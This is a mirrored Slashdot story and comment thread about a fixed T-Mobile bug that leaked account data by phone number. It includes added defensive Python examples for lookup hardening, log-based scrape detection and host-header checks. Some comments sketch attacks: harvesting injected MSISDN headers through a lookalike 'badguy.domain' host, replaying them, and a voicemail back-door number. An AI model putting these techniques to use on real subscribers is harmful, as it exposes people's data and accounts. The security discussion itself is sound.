Slashdot Mirror


T-Mobile Website Allowed Hackers to Access Your Account Data With Just Your Phone Number (vice.com)

Lorenzo Franceschi-Bicchierai, reporting for Motherboard: Until last week, a bug on a T-Mobile website let hackers access personal data such as email address, a customer's T-Mobile account number, and the phone's IMSI, a standardized unique number that identifies subscribers. On Friday, a day after Motherboard asked T-Mobile about the issue, the company fixed the bug. The flaw, which was discovered by security researcher Karan Saini, allowed malicious hackers who knew -- or guessed -- your phone number to obtain data that could've been used for social engineering attacks, or perhaps even to hijack victims' numbers. "T-Mobile has 76 million customers, and an attacker could have run a script to scrape the data (email, name, billing account number, IMSI number, other numbers under the same account which are usually family members) from all 76 million of these customers to create a searchable database with accurate and up-to-date information of all users," Saini, who is the founder of startup Secure7, told Motherboard in an online chat. "That would effectively be classified as a very critical data breach, making every T-Mobile cell phone owner a victim," he added.
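The bug the summary describes is an authorization failure: a lookup keyed on a caller-supplied phone number, with no check that the caller owns that number, so the whole number space can be walked. The following is an added example written for this mirror, not code from T-Mobile, Motherboard or the researcher; the subscriber records, the `Session` object and the function names are constructed for illustration. It puts the unsafe lookup beside a hardened one that requires a login, checks ownership, and never returns the IMSI.

```python
from dataclasses import dataclass
from typing import Optional

# Constructed subscriber records (not real T-Mobile data). The fields mirror
# what the article says the bug exposed: e-mail, account number, IMSI and
# the other numbers on the same account.
ACCOUNTS = {
    "4155550100": {"account_number": "900000001", "email": "alice@example.com",
                   "imsi": "310260000000001", "lines": ["4155550100", "4155550101"]},
    "4155550101": {"account_number": "900000001", "email": "alice@example.com",
                   "imsi": "310260000000002", "lines": ["4155550100", "4155550101"]},
    "2125550150": {"account_number": "900000002", "email": "bob@example.com",
                   "imsi": "310260000000003", "lines": ["2125550150"]},
}


@dataclass
class Session:
    """Who the caller is, as established by an actual login (assumed shape)."""
    account_number: str


class Forbidden(Exception):
    """Raised when the caller may not see the requested record."""


def lookup_vulnerable(msisdn: str) -> Optional[dict]:
    """The pattern behind the bug: the phone number in the request is the only
    input, so anyone who knows or guesses a number gets that subscriber's
    record. Iterating over the number space turns this into the scrape the
    researcher describes."""
    return ACCOUNTS.get(msisdn)


def lookup_hardened(session: Optional[Session], msisdn: str) -> dict:
    """Hardened form: demand an authenticated session, check that the requested
    number belongs to the session's own account, and return only the fields the
    customer-facing page needs (the IMSI never leaves the server)."""
    if session is None:
        raise Forbidden("authentication required")
    record = ACCOUNTS.get(msisdn)
    # One error for both 'no such number' and 'not your number', so the
    # endpoint cannot be used to confirm which numbers exist.
    if record is None or record["account_number"] != session.account_number:
        raise Forbidden("not authorized for this number")
    return {
        "account_number": record["account_number"],
        "email": record["email"],
        "lines": list(record["lines"]),
    }


def is_forbidden(session: Optional[Session], msisdn: str) -> bool:
    """True when the hardened path refuses the request."""
    try:
        lookup_hardened(session, msisdn)
    except Forbidden:
        return True
    return False


if __name__ == "__main__":
    alice = Session(account_number="900000001")
    print("vulnerable, no session:", lookup_vulnerable("2125550150"))
    print("hardened, own line:", lookup_hardened(alice, "4155550101"))
    print("hardened, someone else's line refused:", is_forbidden(alice, "2125550150"))
```

The ownership check is the fix the article implies; returning a single generic refusal for both unknown and foreign numbers is the extra step that stops the endpoint doubling as a number-existence oracle.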

62 comments

  1. Yay! by thegreatbob · · Score: 1

    Guess what service I'm glad I nev... well, shit. A time to be glad I'm not the actual account owner (family plan).

    --
    There is no XUL, only WebExtensions...
  2. Hacker? by DontBeAMoran · · Score: 3, Insightful

    T-Mobile website allowed hackers to access your account data with just your phone number.

    If all it takes is to type a phone number in the URL then it's not hacking.

    "Unlocked doors allow thieves to open them" sounds as stupid. If they're unlocked, anyone can open them, not just thieves.

    --
    #DeleteFacebook
    1. Re:Hacker? by Anonymous Coward · · Score: 0

      Honest people don't try to open doors that they KNOW they shouldn't open.

    2. Re:Hacker? by TooMuchToDo · · Score: 3, Informative

      The US government considers it so, and prosecutes for it.

      "A hacker charged with federal crimes for obtaining the personal data of more than 100,000 iPad owners from AT&T’s publicly accessible website was sentenced on Monday to 41 months in prison followed by three years of supervised release."

      https://www.wired.com/2013/03/...

    3. Re:Hacker? by Anonymous Coward · · Score: 1

      Try using that excuse when going in a stranger's house

    4. Re:Hacker? by Anonymous Coward · · Score: 0

      And it was wrong then too. This is the equivalent of prosecuting someone for trespassing when they were welcomed in by the home owner's crazy ex. How the fuck was I supposed to know the crazy ex, who still had a working key, was not supposed to grant me access??

    5. Re:Hacker? by Anonymous Coward · · Score: 1

      That's because the U.S.A. government is run by a bunch of technology-ignorant fools.

    6. Re:Hacker? by Anonymous Coward · · Score: 1

      Not even close. This is more like someone driving to T-Mobile headquarters, walking around the lobby, noticing a door propped open that had a box in it that says, "sensitive user information," and you saying, "don't mind if I do."

      But let's go with your example. Let's say the homeowner left sensitive information lying around and you started taking pictures of it with your phone. I don't know what the law states in that situation but I would find it hard to believe you were just taking pictures of the countertops.

    7. Re:Hacker? by Anonymous Coward · · Score: 4, Insightful

      Here's the problem with criminalizing accessing publicly accessible data... you put the burden on the *user* of determining what freely available data they "ought" to have access to.

      That's backwards. The custodians of the data have a duty to make it available appropriately... it's not the job of the public to guess at whether public data should be public.

    8. Re:Hacker? by brewthatistrue · · Score: 1

      Sometimes it's obvious you shouldn't be doing that, and sometimes it's not.

      People get in trouble for both scenarios.

      e.g. URL munging the application website at Harvard to see application status results in offers being retracted

      https://arstechnica.com/uncate...

    9. Re:Hacker? by Anonymous Coward · · Score: 0

      If all it takes is to type a phone number in the URL then it's not hacking.

      "Unlocked doors allow thieves to open them" sounds as stupid. If they're unlocked, anyone can open them, not just thieves.

      Most will tell you locks only keep out honest people. What they won't tell you is that - in the court of law - if you open any door, even if you're honest, and I can successfully argue that the door is there to keep you out, while reasonably explaining how anyone with common sense can understand that, then you are still guilty of trespassing. Trespassing is a criminal offense, no matter your intent, and so, if convicted, you will be known as a convicted criminal.

    10. Re:Hacker? by jimbolauski · · Score: 1

      The question is, and always has been, is it reasonable to take? If a kid leaves their bike out in the front yard, is it reasonable to assume they're giving away their bike? If someone leaves their garage door open, is it reasonable to pilfer their tools? Being deficient in understanding societal norms for what is acceptable is not a good defense.

      --
      Knowledge = Power
      P= W/t
      t=Money
      Money = Work/Knowledge so the less you know the more you make
    11. Re:Hacker? by Anonymous Coward · · Score: 0

      One could argue that all data is publicly accessible unless it's on an airgapped network. And even then...

      Imagine someone created a device that uses x-rays to scan your pocket for keys, which could then be used to 3-d print that key. Is that public information? Is it my responsibility to store my keys in a lead-lined case when I am walking down the street? If I was responsible for private information of my customers, and I knew such an attack vector, then yes, I am responsible. But is that "hacking" or is it just scanning public areas for public information? How public is public? If a bank put a cad drawing of the key to their vault on the side of a van and drove it around the city, that's public, and grossly negligent. If a shop owner put his storefront key in his briefcase and walked across the street and someone scanned it, is that public? Then we start arguing about how ubiquitous are the tools (everyone has a web browser, very few people have an x-ray scanner), but everyone has a hammer and it can be used to "unlock" a front door.

      I 100% agree that custodians should be accountable for proper care of private information. I guess I don't see it as an either/or.

  3. That's cool by HideyoshiJP · · Score: 1

    All my other info is out there anyway. If they already know my phone number, there's not much else they need. Thanks, Equifax.

    1. Re:That's cool by Anonymous Coward · · Score: 0

      Oh it was already out there before Equifax. Trust me.

  4. Article is too long, superfluous by Anonymous Coward · · Score: 0

    Until last week, a bug on a T-Mobile website let hackers access personal data such as email address, a customer's T-Mobile account number, and the phone's IMSI, a standardized unique number that identifies subscribers. On Friday, a day after Motherboard asked T-Mobile about the issue, the company fixed the bug.

    This is really all that needs to be written about this story. The rest of the article, like others of its kind, goes on to discuss the scary theoretical harm that could have happened, rather than any actual harm. In fact, the first sentence of the above paragraph should be revised to say, "..let potential hackers access personal data..." since, as the article points out at the very end, T-Mobile didn't find any evidence that hackers exploited, much less even found, the vulnerability.

    So a security researcher finds bug in company's website exposing customer info. Researcher notifies company of bug. Company then fixes bug. Company pays researcher a nice little reward. The end.

    These hacking stories are boring.

    1. Re:Article is too long, superfluous by ThisIsNotAName · · Score: 1

      "T-Mobile didn't find any evidence that hackers exploited, much less even found, the vulnerability."

      Given that those data accesses didn't throw any security errors, I don't trust that T-Mobile would have logged any suspicious activity related to this vulnerability.

      I hope that their security is more comprehensive than that, I just don't trust that it is.

    2. Re:Article is too long, superfluous by Marxist+Hacker+42 · · Score: 1

      I pretty much trust that it isn't. Privacy is largely overrated, and any number attached to your name can eventually be found.

      --
      SJW: a person who perceives an injustice, and while correcting it, commits a greater injustice.
    3. Re:Article is too long, superfluous by Anonymous Coward · · Score: 0

      They didn't find any unusual access of the vulnerable accounts that would be evident if a hacker used a script to scrape the website.

    4. Re:Article is too long, superfluous by ThisIsNotAName · · Score: 1

      Do you have anything to back that up?

      All I found in the original article from T-Mobile was:

      Contrary to Saini's findings, T-Mobile told Motherboard the issue impacted only a small part of their customers. In a statement sent to Motherboard, the company said that "we were alerted to an issue that we investigated and fully resolved in less than 24 hours. There is no indication that it was shared more broadly."

      As far as I can tell, that doesn't clarify whether they have safeguards to detect the accesses and nothing came up or if they simply don't have anything in place and therefore didn't detect anything.

    5. Re:Article is too long, superfluous by networkBoy · · Score: 1

      I'm thinking they looked back in access logs and didn't see any sequential or high rate queries. While that's not even remotely 100% it is a decent indicator of not having been majorly exploited.

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
    6. Re:Article is too long, superfluous by ThisIsNotAName · · Score: 1

      That's what I would assume too. Though, if I were trying to exploit it, I'd try to do it gradually over a long time to not spike activity and you wouldn't necessarily have to make a lot of effort to fly under the radar. Probably just try to vary your IP addresses but keep them within T-Mobile's service areas. Though it probably depends on what kind of traffic analysis they do.

      How likely they'd be to find that would partly depend on how long the vulnerability was present and them keeping their logs for a sufficient length of time. It may have aged out of their logs. It would also depend whether the vulnerability was limited to a small subset, most or all of their customers. T-Mobile's response indicated that it was just some customers. If it didn't work for others and threw a flag it would probably have been caught quickly. Alternatively, to T-Mobile, "some" might mean "all".

      I'm increasingly skeptical of large companies handling security well in light of other news: Equifax, Yahoo, etc.

      Of course, all of this is coming from someone who has had little training and done very little work with computer security.

    7. Re:Article is too long, superfluous by networkBoy · · Score: 1

      I've had a fair amount of experience etc. with this. Like I said, not 100%, and as to being sly there are two MOs:
      1) like you said, sly, spread out, not searching blocks of numbers
      2) crash and grab, dump as much as fast as possible before getting caught.

      If they recognised the value and wanted to get at the data as long as possible, then yes #1 is how they'd go, and reviewing the logs wouldn't be all that reliable.

      --
      whois gawk date unzip strip find touch finger mount join nice man top fsck grep eject more yes exit umount sleep dump
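The exchange above between networkBoy and ThisIsNotAName is about what an after-the-fact log review can and cannot show: sequential number walks and high request rates stand out, while a slow scraper spread across many addresses does not. The following is an added example written for this mirror, not anything from T-Mobile or from either commenter. The access-log lines, the endpoint path and the thresholds are constructed; the three checks are the ones the thread implies, plus a rate-independent per-source cardinality check that catches the slow scraper as long as it keeps one source address.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set, Tuple

# Constructed access-log lines in common log format (not real T-Mobile logs).
# 10.0.0.5 walks six consecutive numbers in six seconds, 10.0.0.9 is a normal
# customer re-checking its own line, 10.0.0.77 is the slow, non-sequential case.
SAMPLE_LOG = """\
10.0.0.5 - - [06/Oct/2017:10:00:01 +0000] "GET /account/lookup?msisdn=4155550100 HTTP/1.1" 200 812
10.0.0.5 - - [06/Oct/2017:10:00:02 +0000] "GET /account/lookup?msisdn=4155550101 HTTP/1.1" 200 790
10.0.0.5 - - [06/Oct/2017:10:00:03 +0000] "GET /account/lookup?msisdn=4155550102 HTTP/1.1" 200 801
10.0.0.5 - - [06/Oct/2017:10:00:04 +0000] "GET /account/lookup?msisdn=4155550103 HTTP/1.1" 200 799
10.0.0.5 - - [06/Oct/2017:10:00:05 +0000] "GET /account/lookup?msisdn=4155550104 HTTP/1.1" 200 805
10.0.0.5 - - [06/Oct/2017:10:00:06 +0000] "GET /account/lookup?msisdn=4155550105 HTTP/1.1" 200 810
10.0.0.9 - - [06/Oct/2017:11:30:00 +0000] "GET /account/lookup?msisdn=2125550150 HTTP/1.1" 200 801
10.0.0.9 - - [06/Oct/2017:11:45:00 +0000] "GET /account/lookup?msisdn=2125550150 HTTP/1.1" 200 801
10.0.0.77 - - [06/Oct/2017:12:00:00 +0000] "GET /account/lookup?msisdn=3035550123 HTTP/1.1" 200 803
10.0.0.77 - - [06/Oct/2017:12:20:00 +0000] "GET /account/lookup?msisdn=7205550188 HTTP/1.1" 200 798
10.0.0.77 - - [06/Oct/2017:12:40:00 +0000] "GET /account/lookup?msisdn=9705550142 HTTP/1.1" 200 811
10.0.0.77 - - [06/Oct/2017:13:00:00 +0000] "GET /account/lookup?msisdn=3035550177 HTTP/1.1" 200 800
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" \d{3} \d+')
MSISDN_RE = re.compile(r"[?&]msisdn=(\d+)")

Event = Tuple[str, datetime, int]   # (client ip, timestamp, queried number)


def parse_log(text: str) -> List[Event]:
    """Extract (ip, time, msisdn) from every line that hits the lookup endpoint."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        num = MSISDN_RE.search(m.group(3))
        if not num:
            continue
        ts = datetime.strptime(m.group(2), "%d/%b/%Y:%H:%M:%S %z")
        events.append((m.group(1), ts, int(num.group(1))))
    return sorted(events, key=lambda e: e[1])


def by_source(events: List[Event]) -> Dict[str, List[Event]]:
    groups: Dict[str, List[Event]] = defaultdict(list)
    for e in events:
        groups[e[0]].append(e)
    return groups


def high_rate_sources(events: List[Event], window_s: int = 60, threshold: int = 5) -> Set[str]:
    """IPs that issued more than `threshold` lookups inside any `window_s` span."""
    flagged = set()
    for ip, evs in by_source(events).items():
        times = [e[1] for e in evs]
        start = 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 > threshold:
                flagged.add(ip)
                break
    return flagged


def sequential_sources(events: List[Event], min_run: int = 4) -> Set[str]:
    """IPs whose queried numbers, in time order, contain a run of consecutive values."""
    flagged = set()
    for ip, evs in by_source(events).items():
        run = 1
        for prev, cur in zip(evs, evs[1:]):
            run = run + 1 if cur[2] == prev[2] + 1 else 1
            if run >= min_run:
                flagged.add(ip)
                break
    return flagged


def wide_sources(events: List[Event], max_distinct: int = 3) -> Set[str]:
    """IPs that looked up more distinct numbers than one account plausibly owns.
    Rate-independent, so it still catches the slow scraper, but only while the
    scraper keeps using the same source address."""
    return {ip for ip, evs in by_source(events).items()
            if len({e[2] for e in evs}) > max_distinct}


def triage(text: str) -> Dict[str, Set[str]]:
    events = parse_log(text)
    return {"high_rate": high_rate_sources(events),
            "sequential": sequential_sources(events),
            "wide": wide_sources(events)}


if __name__ == "__main__":
    for rule, ips in triage(SAMPLE_LOG).items():
        print(f"{rule}: {sorted(ips)}")
```

On the sample, only 10.0.0.5 trips the rate and sequence rules; 10.0.0.77 is caught only by the cardinality rule, and would not be caught at all if its four lookups had come from four addresses, which is ThisIsNotAName's point. Logs also have to still exist for the window in question, so this kind of review only rules out scraping for the period the retention covers.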
  5. It wasn't a bug by cordovaCon83 · · Score: 1

    It was a feature. But don't tell the press that!

  6. T-Mobile Sucks by Anonymous Coward · · Score: 0

    Verizon is the best, followed by AT&T.

    1. Re:T-Mobile Sucks by Anonymous Coward · · Score: 0

      I don't care who's more "evil"

      I'm not an embearded hipster. I care if my call is going to go through.

      And you - shave that fucking stupid beard. It pisses me off. No, it doesn't make you "edgy",

    2. Re:T-Mobile Sucks by Anonymous Coward · · Score: 0

      Verizon is the best, followed by AT&T.

      So you're saying two surviving descendants of Ma Bell are still the best. That's not surprising, and neither is it surprising that the Baby Bells are also most expensive.

    3. Re:T-Mobile Sucks by Anonymous Coward · · Score: 0

      Never heard of either of those two.

    4. Re:T-Mobile Sucks by Anonymous Coward · · Score: 0

      John Legere, is that you?

  7. Equifax can learn a thing or two.. by Anonymous Coward · · Score: 1

    Seems like Equifax can learn a thing or two from T-Mobile.. they're much better at fixing bugs/security holes

  8. X-Nokia-MSISDN by Anonymous Coward · · Score: 0

    If you make an HTTP request from a T-Mobile device to any hostname beginning with "www.t-mobile.com" then your phone number is injected into the request header. All it would take for a web site to scrape phone numbers is to serve a hidden element with a URL like "http://www.t-mobile.com.badguy.domain/" and watch the log fill up with requests like this:

    Host: www.t-mobile.com.badguy.domain
    X-Nokia-MSISDN: phone number
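The flaw this comment describes is a prefix match on the Host value where an exact match was needed, plus an origin that trusts an identity header without caring who put it there. The following is an added example written for this mirror, not code from T-Mobile or from the commenter; the allowlist, the `enrich` function and its normalisation rules are assumptions. It contrasts the prefix check with an exact-host check and shows the gateway stripping any client-supplied copy of the header before deciding whether to add its own.

```python
from typing import Dict

# Assumed for the example: the only host the carrier gateway should label with
# the subscriber's number. The header name is the one named in the comment.
TRUSTED_HOSTS = {"www.t-mobile.com"}
IDENTITY_HEADER = "X-Nokia-MSISDN"


def normalize_host(host: str) -> str:
    """Lower-case, drop a port suffix and a trailing dot, so that
    'WWW.T-Mobile.com:443' and 'www.t-mobile.com.' compare equal to the entry."""
    host = host.strip().lower().split(":", 1)[0]
    return host.rstrip(".")


def host_matches_naive(host: str) -> bool:
    """The check the comment describes: 'begins with www.t-mobile.com'.
    Any hostname that merely starts with those characters satisfies it."""
    return host.lower().startswith("www.t-mobile.com")


def host_matches_strict(host: str) -> bool:
    """Exact match against the allowlist after normalisation."""
    return normalize_host(host) in TRUSTED_HOSTS


def enrich(headers: Dict[str, str], host: str, msisdn: str,
           strict: bool = True) -> Dict[str, str]:
    """Gateway-side enrichment. Any client-supplied copy of the identity header
    is dropped first, so the origin only ever sees a value the gateway set; the
    header is then added only when the Host passes the chosen check."""
    clean = {k: v for k, v in headers.items() if k.lower() != IDENTITY_HEADER.lower()}
    check = host_matches_strict if strict else host_matches_naive
    if check(host):
        clean[IDENTITY_HEADER] = msisdn
    return clean


if __name__ == "__main__":
    lookalike = "www.t-mobile.com.badguy.domain"   # the host from the comment
    print("naive :", host_matches_naive(lookalike))
    print("strict:", host_matches_strict(lookalike))
    print(enrich({"Host": lookalike, IDENTITY_HEADER: "0000000000"}, lookalike, "4155550100"))
```

Two things follow for the origin side, which the code above does not cover: the www.t-mobile.com application should accept the header only on connections that provably came through the gateway (a private path or a gateway-held secret, not an open Internet listener), and it should treat the header as a hint for display, not as a login, since a header is exactly as trustworthy as the weakest party able to set it.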

    1. Re:X-Nokia-MSISDN by Zero__Kelvin · · Score: 1

      I think there might be a flaw in your master plan there Pinky.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    2. Re:X-Nokia-MSISDN by Anonymous Coward · · Score: 0

      The plan where you log request headers from T-Mobile devices and then replay the request headers to the real www.t-mobile.com and steal accounts?

    3. Re:X-Nokia-MSISDN by Zero__Kelvin · · Score: 1

      No. The plan where you get every T-Mobile customer to access your website Pinky. But also that too.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    4. Re:X-Nokia-MSISDN by Anonymous Coward · · Score: 0

      I dunno, Brain, maybe you could pay other people to insert your tracker into their web sites, like Coinhive.

    5. Re:X-Nokia-MSISDN by Zero__Kelvin · · Score: 1

      Yep ... you are one stupid motherfucker.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    6. Re:X-Nokia-MSISDN by Anonymous Coward · · Score: 0

      Let me tell you something. I own a T-Mobile MotherFucker64 Mobile Hotspot. That's the motherfucking model number: MF64. I've owned this motherfucker for so long, I have completely forgotten my T-Mobile account password. I never need my password, because whenever I visit mim.t-mobile.com from any browser on any device tethered to my motherfucker, T-Mobile never asks for my password. Any badguy could access my account and change my plan and charge my credit card. That's how T-Mobile does stupid security.

    7. Re:X-Nokia-MSISDN by Zero__Kelvin · · Score: 1

      Time to take your meds. Off you go now ...

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    8. Re:X-Nokia-MSISDN by Anonymous Coward · · Score: 0

      All right, so this Zero Kelvin person is a totally worthless motherfucker, but maybe someone else with a brain will read about the gaping security flaw which still exists where T-Mobile trusts injected HTTP headers to identify subscribers.

    9. Re: X-Nokia-MSISDN by Zero__Kelvin · · Score: 1

      If you want to be taken seriously by the people who belong here, create an account and log in. No real slashdotter gives a fuck what some idiot rambles on about as an AC, because we know what AC status is for and how it is being abused.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    10. Re:X-Nokia-MSISDN by Anonymous Coward · · Score: 0

      DuckDuckGo t-mobile.com msisdn

      https ://mim.t-mobile.com/primary/openPage?msisdn=

      LOL

    11. Re: X-Nokia-MSISDN by Anonymous Coward · · Score: 0

      If you're the kind of shit that belongs here, there's no hope for slashdot. Fuck you, motherfucker.

    12. Re: X-Nokia-MSISDN by Zero__Kelvin · · Score: 1

      Slashdot lost all hope long ago, my incompetent friend.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    13. Re: X-Nokia-MSISDN by Anonymous Coward · · Score: 0

      Keep posting, Lord Zero IQ. Don't you want a following of AC trolls all screaming "motherfucker" at you? We need another asshole around here to be a troll magnet after the demise of creimy-weimy.

    14. Re: X-Nokia-MSISDN by Zero__Kelvin · · Score: 0

      I truly don't give a flying fuck. If you weren't so fucking stupid you would have figured that out by now.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
  9. You think that's bad? by Anonymous Coward · · Score: 1

    My phone company back in the 1980s would accidentally mail me a thick book with everyone's phone number and physical address. I really could have done some crazy stuff with it, but the most I did with it was to call my classmate's house..

    1. Re:You think that's bad? by Zero__Kelvin · · Score: 1

      yeah ... this isn't that.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    2. Re: You think that's bad? by Anonymous Coward · · Score: 0

      Really ok so getting a person's phone number and email address is worse than knowing their name, phone number, and address?

    3. Re: You think that's bad? by Zero__Kelvin · · Score: 1

      First of all, most landline phone numbers weren't account logins for bank accounts; second of all, there is this little piece of information you don't seem to understand. There is a third and fourth thing that makes it different as well, but you get the idea .. or not. Probably not.

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
    4. Re: You think that's bad? by Anonymous Coward · · Score: 0

      Landline phone numbers are account logins for supermarket loyalty deals. I could use all your discounts.

    5. Re: You think that's bad? by Zero__Kelvin · · Score: 1

      Sure, if that wasn't actually a now defunct mobile number you could :^)

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
  10. A "bug", no, it was intentionally put there by Anonymous Coward · · Score: 0

    Note very well how every time a "bug" or "security issue" pops up, it's a tiny little thing, sticking out like a sore thumb to anyone inspecting the code, which results in a full and complete compromise. You have them in Windows, in macOS, in iOS, and they're ALWAYS intentionally put there.

  11. T-Mobile is Magenta. I like Pink. by Anonymous Coward · · Score: 0

    Na na na na na na na na na na na na [x2]

    I guess I just lost my husband,
    I don't know where he went,
    So I'm gonna drink my money,
    I'm not gonna pay his rent (nope),
    I got a brand new attitude and
    I'm gonna wear it tonight,
    I wanna get in trouble,
    I wanna start a fight,

    Na na na na na na na I wanna start a fight,
    Na na na na na na na I wanna start a fight.

    [Chorus:]
    So, so what
    I'm still a rock star,
    I got my rock moves,
    And I don't need you,
    And guess what,
    I'm having more fun,
    And now that we're done,
    I'm gonna show you tonight,
    I'm alright,
    I'm just fine,
    And you're a tool,
    So, so what,
    I am a rock star,
    I got my rock moves,
    And I don't want you tonight.

    1. Re: T-Mobile is Magenta. I like Pink. by Zero__Kelvin · · Score: 1

      Well at least you finally posted something worthwhile anyeah. Pink is fucking awesome!

      --
      Guns don't kill people; Physics kills people! - John Lithgow as Dick Solomon on Third Rock From The Sun
  12. 1-805-637-7243 Directly to Voice Mail by Trax3001BBS · · Score: 1

    "call 1-805-637-7243, otherwise known as the "Voice Mail Back Door number." When you hear the prompt, i.e. "Welcome to the T-Mobile messaging center. Please enter the 10-digit number of the person you are trying to reach," enter the number. You will then be connected directly with that person's voicemail. Press "1" to leave a message, leave your message and hang up." http://answers.google.com/answ...

  13. Maybe if there is one of these by bravecanadian · · Score: 1

    Every day like there has been for a few days now... IT will finally be forced to turn into a profession.

  14. I'm sure this is like the 3rd-5th time this has happened by Anonymous Coward · · Score: 0

    I've read this story before on /. About 4-5 times over the last 20 years. T-Mobile has had a history of problems with the website.

  15. Maybe we all.... by MoarSauce123 · · Score: 1

    ....should just get a new identity and move. We get random names, SSNs, and addresses assigned and start our lives over from scratch.